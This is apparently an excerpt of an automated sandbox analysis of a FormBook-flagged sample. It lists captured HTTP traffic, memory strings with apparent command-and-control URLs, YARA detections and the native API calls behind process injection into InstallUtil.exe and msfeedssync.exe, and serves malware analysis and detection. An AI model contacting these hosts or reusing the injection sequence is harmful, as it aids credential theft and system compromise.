72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:13:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:15:45 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:15:47 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:15:50 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 14:15:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: 2Stejb80vJ.exe, 00000000.00000002.1267757306.00000000030B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UPM8KZRaz30lCAjNcEm6.exe, 0000000A.00000002.3727661903.000000000589B000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.031234103.xyz
Source: UPM8KZRaz30lCAjNcEm6.exe, 0000000A.00000002.3727661903.000000000589B000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.031234103.xyz/z0it/
Source: msfeedssync.exe, 00000009.00000003.1698444106.0000000007448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: msfeedssync.exe, 00000009.00000003.1698444106.0000000007448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msfeedssync.exe, 00000009.00000003.1698444106.0000000007448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msfeedssync.exe, 00000009.00000003.1698444106.0000000007448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msfeedssync.exe, 00000009.00000003.1698444106.0000000007448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msfeedssync.exe, 00000009.00000003.1698444106.0000000007448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
Source: msfeedssync.exe, 00000009.00000003.1698444106.0000000007448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msfeedssync.exe, 00000009.00000003.1698444106.0000000007448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: 2Stejb80vJ.exe, 00000000.00000002.1280336868.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1280336868.0000000004041000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1289228726.0000000005DC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 2Stejb80vJ.exe, 00000000.00000002.1280336868.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1280336868.0000000004041000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1289228726.0000000005DC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 2Stejb80vJ.exe, 00000000.00000002.1280336868.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1280336868.0000000004041000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1289228726.0000000005DC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: msfeedssync.exe, 00000009.00000002.3724212347.000000000278E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: msfeedssync.exe, 00000009.00000003.1694442203.0000000007423000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: msfeedssync.exe, 00000009.00000002.3724212347.000000000278E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: msfeedssync.exe, 00000009.00000002.3724212347.000000000278E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: msfeedssync.exe, 00000009.00000002.3724212347.000000000278E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: msfeedssync.exe, 00000009.00000002.3724212347.000000000278E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: msfeedssync.exe, 00000009.00000002.3724212347.00000000027B4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: 2Stejb80vJ.exe, 00000000.00000002.1280336868.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1280336868.0000000004041000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1289228726.0000000005DC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: 2Stejb80vJ.exe, 00000000.00000002.1267757306.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1280336868.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1280336868.0000000004041000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1289228726.0000000005DC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 2Stejb80vJ.exe, 00000000.00000002.1280336868.00000000040BD000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1280336868.0000000004041000.00000004.00000800.00020000.00000000.sdmp, 2Stejb80vJ.exe, 00000000.00000002.1289228726.0000000005DC0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: msfeedssync.exe, 00000009.00000003.1698444106.0000000007448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: msfeedssync.exe, 00000009.00000002.3726343665.0000000003E5E000.00000004.10000000.00040000.00000000.sdmp, msfeedssync.exe, 00000009.00000002.3728048573.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 0000000A.00000002.3725944309.0000000003FCE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msfeedssync.exe, 00000009.00000003.1698444106.0000000007448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: msfeedssync.exe, 00000009.00000002.3726343665.0000000004638000.00000004.10000000.00040000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 0000000A.00000002.3725944309.00000000047A8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.seasay.xyz/36xs/?G0L=GB6XqptpYp&ut1tI=RgfpXspOgsNiHmosVF1KbpPv72dzNmiTBjL/Nd6qGeZ/g3
Source: msfeedssync.exe, 00000009.00000002.3726343665.0000000004638000.00000004.10000000.00040000.00000000.sdmp, UPM8KZRaz30lCAjNcEm6.exe, 0000000A.00000002.3725944309.00000000047A8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.seasay.xyz/36xs/?G0L=GB6XqptpYp&ut1tI=RgfpXspOgsNiHmosVF1KbpPv72dzNmiTBjL/Nd6qGeZ/g3rBom

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1511972245.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3727661903.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3725575572.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3725515204.00000000041B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1511179304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3723672280.0000000002470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3724115187.0000000002710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1513679898.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 0_2_0646A7A0 NtResumeThread,	0_2_0646A7A0
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 0_2_06466D90 NtProtectVirtualMemory,	0_2_06466D90
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 0_2_0646A799 NtResumeThread,	0_2_0646A799
Source: C:\Users\user\Desktop\2Stejb80vJ.exe	Code function: 0_2_06466D89 NtProtectVirtualMemory,	0_2_06466D89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_0042C763 NtClose,	2_2_0042C763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2B60 NtClose,LdrInitializeThunk,	2_2_010D2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_010D2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_010D2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D35C0 NtCreateMutant,LdrInitializeThunk,	2_2_010D35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D4340 NtSetContextThread,	2_2_010D4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D4650 NtSuspendThread,	2_2_010D4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2B80 NtQueryInformationFile,	2_2_010D2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2BA0 NtEnumerateValueKey,	2_2_010D2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2BE0 NtQueryValueKey,	2_2_010D2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2BF0 NtAllocateVirtualMemory,	2_2_010D2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2AB0 NtWaitForSingleObject,	2_2_010D2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2AD0 NtReadFile,	2_2_010D2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2AF0 NtWriteFile,	2_2_010D2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2D00 NtSetInformationFile,	2_2_010D2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2D10 NtMapViewOfSection,	2_2_010D2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2D30 NtUnmapViewOfSection,	2_2_010D2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2DB0 NtEnumerateKey,	2_2_010D2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2DD0 NtDelayExecution,	2_2_010D2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2C00 NtQueryInformationProcess,	2_2_010D2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2C60 NtCreateKey,	2_2_010D2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2CA0 NtQueryInformationToken,	2_2_010D2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2CC0 NtQueryVirtualMemory,	2_2_010D2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2CF0 NtOpenProcess,	2_2_010D2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2F30 NtCreateSection,	2_2_010D2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2F60 NtCreateProcessEx,	2_2_010D2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2F90 NtProtectVirtualMemory,	2_2_010D2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2FA0 NtQuerySection,	2_2_010D2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2FB0 NtResumeThread,	2_2_010D2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2FE0 NtCreateFile,	2_2_010D2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2E30 NtWriteVirtualMemory,	2_2_010D2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2E80 NtReadVirtualMemory,	2_2_010D2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2EA0 NtAdjustPrivilegesToken,	2_2_010D2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D2EE0 NtQueueApcThread,	2_2_010D2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D3010 NtOpenDirectoryObject,	2_2_010D3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D3090 NtSetValueKey,	2_2_010D3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D39B0 NtGetContextThread,	2_2_010D39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D3D10 NtOpenProcessToken,	2_2_010D3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 2_2_010D3D70 NtOpenThread,	2_2_010D3D70
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE4340 NtSetContextThread,LdrInitializeThunk,	9_2_02CE4340
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE4650 NtSuspendThread,LdrInitializeThunk,	9_2_02CE4650
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2AD0 NtReadFile,LdrInitializeThunk,	9_2_02CE2AD0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2AF0 NtWriteFile,LdrInitializeThunk,	9_2_02CE2AF0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2BE0 NtQueryValueKey,LdrInitializeThunk,	9_2_02CE2BE0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_02CE2BF0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2BA0 NtEnumerateValueKey,LdrInitializeThunk,	9_2_02CE2BA0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2B60 NtClose,LdrInitializeThunk,	9_2_02CE2B60
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2EE0 NtQueueApcThread,LdrInitializeThunk,	9_2_02CE2EE0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2E80 NtReadVirtualMemory,LdrInitializeThunk,	9_2_02CE2E80
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2FE0 NtCreateFile,LdrInitializeThunk,	9_2_02CE2FE0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2FB0 NtResumeThread,LdrInitializeThunk,	9_2_02CE2FB0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2F30 NtCreateSection,LdrInitializeThunk,	9_2_02CE2F30
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2CA0 NtQueryInformationToken,LdrInitializeThunk,	9_2_02CE2CA0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2C60 NtCreateKey,LdrInitializeThunk,	9_2_02CE2C60
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_02CE2C70
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2DD0 NtDelayExecution,LdrInitializeThunk,	9_2_02CE2DD0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_02CE2DF0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2D10 NtMapViewOfSection,LdrInitializeThunk,	9_2_02CE2D10
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE2D30 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_02CE2D30
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE35C0 NtCreateMutant,LdrInitializeThunk,	9_2_02CE35C0
Source: C:\Windows\SysWOW64\msfeedssync.exe	Code function: 9_2_02CE39B0 NtGetContextThread,LdrInitializeThunk,	9_2_02CE39B0
